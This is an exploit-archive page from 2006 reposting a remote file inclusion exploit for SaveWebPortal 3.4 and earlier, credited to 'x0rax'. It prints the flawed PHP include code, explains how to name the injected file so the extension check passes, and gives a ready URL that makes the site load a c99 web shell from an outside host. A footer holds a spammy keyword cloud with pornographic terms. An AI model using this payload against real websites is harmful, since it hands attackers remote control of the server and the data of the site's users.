about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , SaveWebPortal <= 3.4 (page) Remote File Inclusion Vulnerability




2006-08-10 SaveWebPortal <= 3.4 (page) Remote File Inclusion Vulnerability
Rated as : High Risk

--------------------------------------------
SaveWebPortal <= 3.4(page) Remote File Inclusion Vulnerability
Download:http://www.circeos.it/frontend/theme4/index.php?page=downloads
--------------------------------------------
Found by x0rax
Master9976@hotmail.de
--------------------------------------------
Vulnerable Code:
<?php
....
if (strstr ($page, ".php") ||
                       strstr ($page, ".htm") ||
                       strstr ($page, ".html")) {
                       include ("$page");
....
?>
--------------------------------------------
to inject succesfully you have to create a file called shell.html.txt or
shell.php.txt
otherwise it wont work!
--------------------------------------------
Affected File:
index.php =]
--------------------------------------------
Vulnerability:
http://host.com/index.php?page=http://master-boy.cwsurf.de/c99.php.txt
--------------------------------------------
securitydot.net - 2006-08-10

Advertising

Copyright 2007, SecurityDot
Thu, 10 Dec 2009 01:28:14 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Hotbabe.co 143 MS05-018-C news for c confixx ex mambo Remo sabah porn azraels xueling.or sanka free.sex.m Video phon cat /etc/c www.teen p Saxyfota www.keyoua crack+data n...om_log www.irantv Big boobs. MALAYALI G WORLDSEXWW video prno Bisexual news for c www.sz-web www.sinoyi bangla adu WCWW.HOTSE sexy news for c www.qjy168 Linux Kern t27t php-nuke 2 www.filmac onlinewebp PHP Classi socks bot shilpashet hz.lt99.co www.zj138. news for c mysql 4.0. Xxx.freepo Linux Expl Cumbia WebMin netcat www.tonbo.